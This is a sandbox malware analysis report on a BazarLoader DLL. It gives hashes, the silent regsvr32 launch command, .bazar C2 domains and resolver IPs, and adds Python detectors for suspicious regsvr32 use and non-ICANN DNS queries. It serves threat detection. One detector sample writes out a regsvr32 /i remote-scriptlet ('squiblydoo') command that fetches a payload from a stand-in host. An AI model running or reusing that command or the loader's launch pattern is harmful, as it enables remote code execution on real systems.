Malware Analysis Report

2024-10-23 17:37

Sample ID 231225-t8xb9ahadk
Target 2e1d6c57465d2399a54708ae1ffbebb0
SHA256 6a5d2d7b3eb9ac26f0bdf852a38ed3bb5f6be9a2abf9339d4cf41e8e946ebb1a
Tags
bazarloader dropper loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6a5d2d7b3eb9ac26f0bdf852a38ed3bb5f6be9a2abf9339d4cf41e8e946ebb1a

Threat Level: Known bad

The file 2e1d6c57465d2399a54708ae1ffbebb0 was found to be: Known bad.

Malicious Activity Summary

bazarloader dropper loader

Bazar Loader

Bazar/Team9 Loader payload

Tries to connect to .bazar domain

Unexpected DNS network traffic destination

Unsigned PE

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2023-12-25 16:44

Signatures

Unsigned PE

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-25 16:44

Reported

2023-12-26 12:35

Platform

win7-20231215-en

Max time kernel

140s

Max time network

149s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Signatures

Bazar Loader

loader dropper bazarloader

Bazar/Team9 Loader payload

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A
N/A          N/A        N/A      N/A
N/A          N/A        N/A      N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll
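Both detonations start the sample the same way: regsvr32.exe, a signed Microsoft binary, is told to load a DLL out of the user's Temp directory and call its DllRegisterServer export; /s suppresses the success/failure dialog, so nothing is shown on screen. The following is an added example of a process-creation check for that launch pattern, written for this report and not part of Triage's signature code. The field names, the list of user-writable directory markers and the comparison command lines are assumptions; only the first sample command line comes from the report.

```python
"""Process-creation check for the launch pattern in this report: regsvr32
silently loading a module from a user-writable directory. Added example; the
directory markers and the non-report command lines are assumptions."""
import re
from typing import Optional

# Directory markers (lower-case, backslash form) an unprivileged user can write to.
USER_WRITABLE = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\downloads\\",
    "\\programdata\\",
    "\\users\\public\\",
)

# Windows-style tokeniser: double-quoted spans or runs of non-whitespace.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmd: str) -> list:
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmd)]


def regsvr32_module(argv: list) -> Optional[str]:
    """Return the module regsvr32 is asked to (un)register, or None if argv is not regsvr32.

    Switches (/s silent, /u unregister, /n skip DllRegisterServer, /i[:cmd] call
    DllInstall) start with '/' or '-'; the first remaining token is the module path.
    """
    if not argv:
        return None
    image = argv[0].lower().replace("/", "\\").rsplit("\\", 1)[-1]
    if image not in ("regsvr32", "regsvr32.exe"):
        return None
    for arg in argv[1:]:
        if not arg.startswith(("/", "-")):
            return arg
    return None


def assess(cmd: str) -> dict:
    """Classify one process command line; 'reasons' is empty for ordinary regsvr32 use."""
    argv = split_cmdline(cmd)
    module = regsvr32_module(argv)
    if module is None:
        return {"regsvr32": False, "module": None, "silent": False, "reasons": []}
    switches = [a.lower() for a in argv[1:] if a.startswith(("/", "-"))]
    low = module.lower().replace("/", "\\")
    reasons = []
    if any(marker in low for marker in USER_WRITABLE):
        reasons.append("module_in_user_writable_path")
    if not low.endswith(".dll"):
        reasons.append("module_without_dll_extension")
    # /i:<url> hands a URL to scrobj.dll (the "squiblydoo" scriptlet technique).
    if any(s.startswith("/i:") and "://" in s for s in switches):
        reasons.append("remote_scriptlet_via_/i")
    return {"regsvr32": True, "module": module, "silent": "/s" in switches, "reasons": reasons}


# Constructed events: the command line from this report plus two comparison cases.
SAMPLE_CMDLINES = [
    r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll",
    r"C:\Windows\system32\regsvr32.exe /s C:\Windows\System32\vbscript.dll",
    r"regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
]

if __name__ == "__main__":
    for cmdline in SAMPLE_CMDLINES:
        print(assess(cmdline))
```

The report's command line trips only the user-writable-path reason; the silent flag is recorded separately because legitimate installers also use /s, so it should weight a detection rather than trigger one on its own.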

Network

Names ending in in-addr.arpa are reverse (PTR) lookups; "-" means no domain was recorded for the connection.

Country  Destination           Domain                        Proto
US       52.8.202.218:443      -                             tcp
US       52.8.202.218:443      -                             tcp
US       54.185.61.176:443     -                             tcp
US       54.185.61.176:443     -                             tcp
NL       45.148.120.206:443    -                             tcp
NL       45.148.120.206:443    -                             tcp
DE       45.153.240.189:443    -                             tcp
DE       45.153.240.189:443    -                             tcp
US       8.8.8.8:53            api.opennicproject.org        udp
DE       116.203.98.109:443    api.opennicproject.org        tcp
US       8.8.8.8:53            apps.identrust.com            udp
GB       96.17.179.205:80      apps.identrust.com            tcp
DE       116.203.98.109:443    api.opennicproject.org        tcp

Files

Reading the entries below: the memory dumps are regions of PID 2916 (regsvr32.exe is the only process in this run). In both runs a 0x3E000-byte region is captured twice (dump offsets 0 and 3) alongside a 0x181000-byte region (offset 1). The Cab*.tmp, Tar*.tmp and CryptnetUrlCache entries are created by the Windows CryptoAPI certificate-chain/CRL download (the apps.identrust.com requests in the Network table), not written by the sample, so they are sandbox noise rather than dropped payloads.

memory/2916-0-0x0000000027600000-0x000000002763E000-memory.dmp

memory/2916-1-0x000007FEF6860000-0x000007FEF69E1000-memory.dmp

memory/2916-3-0x0000000027600000-0x000000002763E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4720.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar47BF.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d3b38b2f68ab80c66b04c2c2b1ee4946
SHA1 11c1f4b8ccc5e770b3f06f4e3512d82257fb95c5
SHA256 f1fe50512e3db14e98d64972445280cd96cc1d6f0ac9bb6f295968d0de11e774
SHA512 27d07f78bd8e052cbce0df623b652bd27c6cc2bda7c16db13615f2074a0a6c0aacd513758b9bcc7f5696a2da342d2ceb8f91a5e75d36283b43892ed1b301addf

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-25 16:44

Reported

2023-12-26 12:36

Platform

win10v2004-20231215-en

Max time kernel

143s

Max time network

154s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Signatures

Bazar Loader

loader dropper bazarloader

Bazar/Team9 Loader payload

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A
N/A          N/A        N/A      N/A
N/A          N/A        N/A      N/A

Tries to connect to .bazar domain

.bazar is an EmerDNS (Emercoin blockchain) top-level domain that does not exist in the ICANN root, so the sandbox's 8.8.8.8 resolver cannot answer for it. The queries below were sent to other port-53 hosts instead, immediately after the api.opennicproject.org contact in the Network table, which is consistent with the loader fetching a list of OpenNIC resolvers and querying them directly; the "Unexpected DNS network traffic destination" signature records those resolvers. The Win7 run (behavioral1) reached api.opennicproject.org but issued no .bazar query within its 149s network window.

Description  Indicator               Process  Target
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          yellowdownpour81.bazar  N/A      N/A
N/A          whitestorm9p.bazar      N/A      N/A
N/A          whitestorm9p.bazar      N/A      N/A

Unexpected DNS network traffic destination

Each IP below appears in the Network table as a port-53 destination, other than the configured 8.8.8.8 resolver, for a .bazar query.

Description     Indicator        Process  Target
Destination IP  94.16.114.254    N/A      N/A
Destination IP  195.10.195.195   N/A      N/A
Destination IP  194.36.144.87    N/A      N/A
Destination IP  217.160.188.24   N/A      N/A
Destination IP  172.98.193.62    N/A      N/A
Destination IP  198.50.135.212   N/A      N/A
Destination IP  91.217.137.37    N/A      N/A
Destination IP  194.36.144.87    N/A      N/A
Destination IP  195.10.195.195   N/A      N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2e1d6c57465d2399a54708ae1ffbebb0.dll

Network

Names ending in in-addr.arpa are reverse (PTR) lookups; "-" means no domain was recorded for the connection.

Country  Destination           Domain                        Proto
US       8.8.8.8:53            16.53.126.40.in-addr.arpa     udp
US       8.8.8.8:53            173.178.17.96.in-addr.arpa    udp
US       8.8.8.8:53            95.221.229.192.in-addr.arpa   udp
US       8.8.8.8:53            59.128.231.4.in-addr.arpa     udp
US       8.8.8.8:53            57.169.31.20.in-addr.arpa     udp
US       8.8.8.8:53            241.154.82.20.in-addr.arpa    udp
US       8.8.8.8:53            79.121.231.20.in-addr.arpa    udp
US       8.8.8.8:53            26.165.165.52.in-addr.arpa    udp
US       8.8.8.8:53            167.109.18.2.in-addr.arpa     udp
US       52.8.202.218:443      -                             tcp
US       8.8.8.8:53            198.187.3.20.in-addr.arpa     udp
US       54.185.61.176:443     -                             tcp
US       8.8.8.8:53            217.135.221.88.in-addr.arpa   udp
US       8.8.8.8:53            206.23.85.13.in-addr.arpa     udp
US       8.8.8.8:53            26.35.223.20.in-addr.arpa     udp
US       8.8.8.8:53            tse1.mm.bing.net              udp
US       204.79.197.200:443    tse1.mm.bing.net              tcp
US       204.79.197.200:443    tse1.mm.bing.net              tcp
US       204.79.197.200:443    tse1.mm.bing.net              tcp
US       204.79.197.200:443    tse1.mm.bing.net              tcp
US       204.79.197.200:443    tse1.mm.bing.net              tcp
US       8.8.8.8:53            200.197.79.204.in-addr.arpa   udp
US       8.8.8.8:53            57.110.18.2.in-addr.arpa      udp
US       8.8.8.8:53            100.5.17.2.in-addr.arpa       udp
US       8.8.8.8:53            119.110.54.20.in-addr.arpa    udp
NL       45.148.120.206:443    -                             tcp
DE       45.153.240.189:443    -                             tcp
US       8.8.8.8:53            240.221.184.93.in-addr.arpa   udp
US       8.8.8.8:53            32.134.221.88.in-addr.arpa    udp
US       8.8.8.8:53            30.243.111.52.in-addr.arpa    udp
US       8.8.8.8:53            -                             udp
DE       116.203.98.109:443    -                             tcp
US       8.8.8.8:53            32.169.19.2.in-addr.arpa      udp
DE       116.203.98.109:443    -                             tcp
US       8.8.8.8:53            193.179.17.96.in-addr.arpa    udp
US       8.8.8.8:53            195.195.10.195.in-addr.arpa   udp
PA       186.73.40.224:443     -                             tcp
US       8.8.8.8:53            -                             udp
N/A      2.19.169.32:80        -                             tcp
US       8.8.8.8:53            -                             udp
US       8.8.8.8:53            -                             udp
N/A      96.17.179.193:80      -                             tcp
DE       195.10.195.195:53     -                             udp
DE       195.10.195.195:53     whitestorm9p.bazar            udp
DE       194.36.144.87:53      whitestorm9p.bazar            udp
PA       186.73.40.224:443     -                             tcp
US       8.8.8.8:53            87.144.36.194.in-addr.arpa    udp
DE       195.10.195.195:53     yellowdownpour81.bazar        udp
DE       194.36.144.87:53      yellowdownpour81.bazar        udp
RU       91.217.137.37:53      yellowdownpour81.bazar        udp
DE       217.160.188.24:53     yellowdownpour81.bazar        udp
US       172.98.193.62:53      yellowdownpour81.bazar        udp
US       8.8.8.8:53            24.188.160.217.in-addr.arpa   udp
US       8.8.8.8:53            62.193.98.172.in-addr.arpa    udp
CA       198.50.135.212:53     yellowdownpour81.bazar        udp
DE       94.16.114.254:53      yellowdownpour81.bazar        udp
PA       186.73.40.224:443     -                             tcp
US       8.8.8.8:53            212.135.50.198.in-addr.arpa   udp
US       8.8.8.8:53            254.114.16.94.in-addr.arpa    udp
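The two network signatures that fired for this run, "Unexpected DNS network traffic destination" and "Tries to connect to .bazar domain", reduce to two checks over the rows above: DNS sent to a resolver other than the host's configured one, and a query name whose top-level domain is not in the ICANN root. The following is an added example of that detection logic run over a constructed subset of the table; it is written for this page and is not Triage's signature code. The resolver allowlist (8.8.8.8, the sandbox resolver seen here) and the list of non-ICANN TLDs beyond .bazar are assumptions.

```python
"""Detection for the two network signatures in this report: DNS sent to
resolvers other than the expected one, and queries for non-ICANN TLDs such as
.bazar. Added example built on the report's own rows, not Triage's code."""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Optional

# Resolver(s) the host should be talking to. 8.8.8.8 is the sandbox resolver in
# this report; substitute your own DNS servers in production (assumption).
EXPECTED_RESOLVERS = {"8.8.8.8"}

# Top-level domains served by EmerDNS/OpenNIC rather than the ICANN root.
# .bazar is the one this sample uses; the other three are assumed extras.
NON_ICANN_TLDS = {"bazar", "coin", "emc", "lib"}


@dataclass(frozen=True)
class Flow:
    country: str
    dst_ip: str
    dst_port: int
    domain: Optional[str]
    proto: str


def parse_flow(line: str) -> Flow:
    """Parse one 'Country Destination [Domain] Proto' row as printed in this report.

    A missing domain may be absent entirely or written as '-'.
    """
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = None
    else:
        raise ValueError(f"unparseable row: {line!r}")
    if domain == "-":
        domain = None
    if ":" not in dest:
        raise ValueError(f"destination without port: {dest!r}")
    ip, port = dest.rsplit(":", 1)
    ip_address(ip)  # raises ValueError on garbage so it cannot slip past the allowlist
    return Flow(country, ip, int(port), domain, proto.lower())


def classify(flow: Flow) -> list:
    """Return the detection labels that fire for one flow (empty for benign rows)."""
    hits = []
    is_dns = flow.dst_port == 53 and flow.proto == "udp"
    if is_dns and flow.dst_ip not in EXPECTED_RESOLVERS:
        hits.append("unexpected_dns_destination")
    if flow.domain:
        tld = flow.domain.rstrip(".").rsplit(".", 1)[-1].lower()
        if tld in NON_ICANN_TLDS:
            hits.append("non_icann_tld_query")
    return hits


def scan(rows) -> dict:
    """Map each label to the sorted indicators (resolver IPs or query names) behind it."""
    found = {}
    for line in rows:
        line = line.strip()
        if not line or line.startswith("Country"):
            continue
        flow = parse_flow(line)
        for label in classify(flow):
            key = flow.domain if label == "non_icann_tld_query" else flow.dst_ip
            found.setdefault(label, set()).add(key)
    return {label: sorted(keys) for label, keys in found.items()}


# Constructed input: a subset of rows copied from the behavioral2 Network table.
SAMPLE_ROWS = """
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
DE 116.203.98.109:443 tcp
DE 195.10.195.195:53 udp
DE 195.10.195.195:53 whitestorm9p.bazar udp
DE 194.36.144.87:53 whitestorm9p.bazar udp
RU 91.217.137.37:53 yellowdownpour81.bazar udp
US 8.8.8.8:53 24.188.160.217.in-addr.arpa udp
"""

if __name__ == "__main__":
    for label, indicators in scan(SAMPLE_ROWS.splitlines()).items():
        print(f"{label}: {', '.join(indicators)}")
```

The reverse (PTR) lookups and the Bing traffic to 8.8.8.8 produce no hits, while the three non-8.8.8.8 resolvers and both .bazar names do; the same logic applied to a DNS server or firewall log, with the host's real resolvers in EXPECTED_RESOLVERS, catches this loader's name resolution even when the .bazar names themselves rotate.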

Files

memory/3120-0-0x0000000027E40000-0x0000000027E7E000-memory.dmp

memory/3120-1-0x00007FFAD53C0000-0x00007FFAD5541000-memory.dmp

memory/3120-3-0x0000000027E40000-0x0000000027E7E000-memory.dmp